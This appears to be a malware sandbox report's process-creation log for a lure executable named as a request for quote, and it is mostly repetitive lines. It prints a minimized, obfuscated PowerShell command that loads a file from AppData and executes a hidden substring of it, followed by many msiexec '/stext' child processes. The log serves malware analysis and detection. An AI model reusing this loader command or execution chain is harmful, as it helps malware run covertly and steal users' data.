              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
